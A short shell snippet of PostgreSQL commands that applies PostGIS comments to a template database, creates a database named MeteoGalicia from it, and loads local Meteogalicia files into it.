psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis_comments.sql
createdb -U postgres -T template_postgis MeteoGalicia
cat Meteogalicia* | psql MeteoGalicia